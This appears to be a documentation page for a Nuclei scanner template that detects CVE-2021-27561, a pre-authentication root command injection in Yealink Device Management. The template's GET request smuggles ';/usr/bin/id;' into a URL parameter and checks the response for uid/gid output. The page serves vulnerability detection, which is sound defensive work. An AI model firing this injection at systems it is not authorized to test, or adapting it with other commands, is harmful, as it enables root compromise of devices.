YeaLink DM 3.6.0.20 - Remote Command Injection
ID: CVE-2021-27561
Severity: critical
Author: shifacyclewala,hackergautam
Tags: cve2021,cve,rce,yealink,mirai,kev
Description
Section titled “Description”Yealink Device Management (DM) 3.6.0.20 allows command injection as root via the /sm/api/v1/firewall/zone/services URI, without authentication.
YAML Source
Section titled “YAML Source”id: CVE-2021-27561
info: name: YeaLink DM 3.6.0.20 - Remote Command Injection author: shifacyclewala,hackergautam severity: critical description: Yealink Device Management (DM) 3.6.0.20 allows command injection as root via the /sm/api/v1/firewall/zone/services URI, without authentication. impact: | Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected device. remediation: | Update to the latest firmware version provided by the vendor to mitigate this vulnerability. reference: - https://ssd-disclosure.com/ssd-advisory-yealink-dm-pre-auth-root-level-rce/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-27561 - https://ssd-disclosure.com/?p=4688 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-27561 cwe-id: CWE-78 epss-score: 0.97435 epss-percentile: 0.99942 cpe: cpe:2.3:a:yealink:device_management:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: yealink product: device_management tags: cve2021,cve,rce,yealink,mirai,kev
http: - method: GET path: - "{{BaseURL}}/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"
matchers-condition: and matchers: - type: word part: body words: - 'uid' - 'gid' - 'groups' condition: and
- type: word part: header words: - 'application/json'
- type: status status: - 200
extractors: - type: regex regex: - "(u|g)id=.*"# digest: 4a0a0047304502205a9c779987cc0eebec2903d7d33ffa4210e79410186e9fec82c9ba80522156d6022100d6703319e73957e1dc0f156059e0d5478e3d1480f53c559c5a44d870274b90ec:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-27561.yaml"